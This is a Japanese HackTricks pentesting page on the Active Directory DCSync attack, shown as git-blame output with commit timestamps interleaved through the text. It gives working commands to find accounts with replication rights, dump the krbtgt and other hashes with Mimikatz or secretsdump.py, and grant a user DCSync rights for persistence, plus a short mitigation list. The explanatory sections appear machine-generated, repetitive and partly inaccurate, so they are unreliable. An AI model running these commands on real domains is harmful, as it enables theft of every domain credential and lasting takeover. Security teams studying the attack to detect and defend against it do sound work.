2022-08-31 22:35:39 +00:00
|
|
|
|
# DCSync
|
|
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
2022-08-31 22:35:39 +00:00
|
|
|
|
|
|
|
|
|
|
\
|
2023-09-24 15:28:04 +00:00
|
|
|
|
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**し、自動化します。\
|
2023-07-07 23:42:27 +00:00
|
|
|
|
今すぐアクセスを取得:
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2022-08-31 22:35:39 +00:00
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
2023-04-25 20:35:28 +02:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですか、またはHackTricksをPDFでダウンロードしたいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
|
2023-09-03 18:55:41 +00:00
|
|
|
|
* [**公式のPEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
|
2023-09-28 20:14:46 +00:00
|
|
|
|
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
|
|
|
|
* **ハッキングのトリックを共有するには、**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **および** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
2022-08-31 22:35:39 +00:00
|
|
|
|
## DCSync
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**DCSync**権限は、ドメイン自体に対して次の権限を持つことを意味します:**DS-Replication-Get-Changes**、**Replicating Directory Changes All**、および**Replicating Directory Changes In Filtered Set**。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**DCSyncに関する重要な注意事項:**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
* **DCSync攻撃は、ドメインコントローラの動作をシミュレートし、他のドメインコントローラに情報のレプリケーションを要求**します。これは、Active Directoryの有効で必要な機能であるため、オフまたは無効にすることはできません。
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* デフォルトでは、**Domain Admins、Enterprise Admins、Administrators、およびDomain Controllers**グループのみが必要な特権を持っています。
|
|
|
|
|
|
* もし、任意のアカウントのパスワードが可逆暗号化で保存されている場合、Mimikatzにはパスワードを平文で返すオプションがあります。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### 列挙
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
`powerview`を使用してこれらの権限を持つユーザーをチェックします:
|
2022-10-05 20:40:19 +00:00
|
|
|
|
```powershell
|
|
|
|
|
|
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
2023-09-28 20:14:46 +00:00
|
|
|
|
### ローカルでのエクスプロイト
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
DCSyncは、Active Directory(AD)ドメインコントローラ(DC)からユーザーのハッシュを取得するための攻撃手法です。この攻撃手法を使用すると、攻撃者はドメイン内の任意のユーザーアカウントのハッシュを取得し、そのユーザーの特権を悪用することができます。
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
DCSync攻撃を実行するためには、攻撃者はドメイン内の有効なユーザーアカウントを持つ必要があります。攻撃者は、攻撃対象のドメインコントローラに対して認証を行い、その後、攻撃者が指定したユーザーアカウントのハッシュを取得するための特権を取得します。
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
以下の手順に従って、DCSync攻撃をローカルで実行することができます。
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
1. 攻撃者は攻撃対象のドメインコントローラに対して認証を行います。これには、攻撃者が有効なユーザーアカウントを持っている必要があります。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
2. 攻撃者は攻撃対象のドメインコントローラに対して、DCSync攻撃を実行するための特権を取得します。これには、攻撃者がドメイン管理者の特権を持っている必要があります。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
3. 攻撃者は攻撃対象のユーザーアカウントのハッシュを取得します。これには、攻撃者が攻撃対象のユーザーアカウントのSID(セキュリティ識別子)を知っている必要があります。
|
|
|
|
|
|
|
|
|
|
|
|
4. 攻撃者は取得したハッシュを使用して、攻撃対象のユーザーアカウントの特権を悪用することができます。これには、攻撃者がハッシュを解読し、パスワードを取得する必要があります。
|
|
|
|
|
|
|
|
|
|
|
|
DCSync攻撃は、攻撃者がドメイン内のユーザーアカウントの特権を悪用するための強力な手法です。攻撃者は、この攻撃手法を使用して、ドメイン内の重要な情報にアクセスしたり、攻撃対象のユーザーアカウントを制御したりすることができます。
|
2022-10-05 20:40:19 +00:00
|
|
|
|
```powershell
|
2020-07-15 15:43:14 +00:00
|
|
|
|
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
|
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### リモートでの攻撃
|
|
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
DCSyncは、Active Directory(AD)ドメインコントローラ(DC)からユーザーのハッシュを取得するための攻撃手法です。この攻撃手法を使用すると、攻撃者はドメイン内のユーザーアカウントのハッシュを取得し、それを使用して認証情報を盗むことができます。
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
DCSync攻撃を実行するためには、攻撃者はドメイン内の有効なユーザーアカウントを持つ必要があります。攻撃者は、攻撃対象のドメインコントローラに対してリモートで認証を行い、攻撃対象のユーザーアカウントのハッシュを取得します。
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
以下は、DCSync攻撃を実行するための手順です。
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
1. 攻撃者は攻撃対象のドメインコントローラに対してリモートで認証を行います。
|
|
|
|
|
|
2. 攻撃者は攻撃対象のユーザーアカウントのSID(セキュリティ識別子)を取得します。
|
|
|
|
|
|
3. 攻撃者はDCSync攻撃を実行するために、攻撃対象のドメインコントローラに対して特権のある操作を要求します。
|
|
|
|
|
|
4. 攻撃者は攻撃対象のユーザーアカウントのハッシュを取得します。
|
|
|
|
|
|
5. 攻撃者は取得したハッシュを使用して、認証情報を盗みます。
|
2023-07-07 23:42:27 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
DCSync攻撃は、攻撃者がドメイン内のユーザーアカウントのハッシュを取得するための効果的な手法です。攻撃者はこれを利用して、ドメイン内の他のシステムやサービスにアクセスすることができます。
|
2022-10-05 20:40:19 +00:00
|
|
|
|
```powershell
|
|
|
|
|
|
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
|
|
|
|
|
|
[-just-dc-user <USERNAME>] #To get only of that user
|
|
|
|
|
|
[-pwd-last-set] #To see when each account's password was last changed
|
|
|
|
|
|
[-history] #To dump password history, may be helpful for offline password cracking
|
2021-10-08 19:05:56 +13:00
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
`-just-dc`は3つのファイルを生成します:
|
2021-10-08 19:05:56 +13:00
|
|
|
|
|
2023-09-24 15:28:04 +00:00
|
|
|
|
* NTLMハッシュを含む1つのファイル
|
|
|
|
|
|
* Kerberosキーを含む1つのファイル
|
2023-09-28 20:14:46 +00:00
|
|
|
|
* NTDSのクリアテキストパスワードを含む1つのファイル。[**reversible encryption**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) \*\*\*\*が有効になっているアカウントのNTDSからクリアテキストパスワードを取得できます。reversible encryptionが有効なユーザーを取得するには、次のコマンドを使用します。
|
2022-10-05 20:40:19 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
```powershell
|
|
|
|
|
|
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
|
|
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### 持続性
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
ドメイン管理者であれば、`powerview`のヘルプを使用して、これらの権限を任意のユーザーに付与することができます。
|
2022-10-05 20:40:19 +00:00
|
|
|
|
```powershell
|
2020-07-15 15:43:14 +00:00
|
|
|
|
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
|
|
|
|
|
|
```
|
2023-09-28 20:14:46 +00:00
|
|
|
|
次に、**ユーザーが正しく割り当てられているかどうかを確認**することができます。これらの特権を出力の中から検索して、それらの特権の名前を「ObjectType」フィールドの中に見ることができるはずです。
|
2022-10-05 20:40:19 +00:00
|
|
|
|
```powershell
|
2020-07-15 15:43:14 +00:00
|
|
|
|
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
|
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### 緩和策
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* セキュリティイベントID 4662(オブジェクトの監査ポリシーが有効である必要があります)- オブジェクトに対して操作が実行されました
|
|
|
|
|
|
* セキュリティイベントID 5136(オブジェクトの監査ポリシーが有効である必要があります)- ディレクトリサービスオブジェクトが変更されました
|
|
|
|
|
|
* セキュリティイベントID 4670(オブジェクトの監査ポリシーが有効である必要があります)- オブジェクトのアクセス許可が変更されました
|
|
|
|
|
|
* AD ACLスキャナー - ACLの作成と比較を行い、レポートを作成します。 [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## 参考文献
|
2022-10-05 20:40:19 +00:00
|
|
|
|
|
|
|
|
|
|
* [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
|
|
|
|
|
|
* [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
2023-04-25 20:35:28 +02:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2023-09-24 15:28:04 +00:00
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
|
2023-09-24 15:28:04 +00:00
|
|
|
|
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
|
|
|
|
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
2023-09-28 20:14:46 +00:00
|
|
|
|
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
2022-08-31 22:35:39 +00:00
|
|
|
|
|
|
|
|
|
|
\
|
2023-09-03 18:55:41 +00:00
|
|
|
|
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。\
|
2023-07-07 23:42:27 +00:00
|
|
|
|
今すぐアクセスを取得:
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2022-08-31 22:35:39 +00:00
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
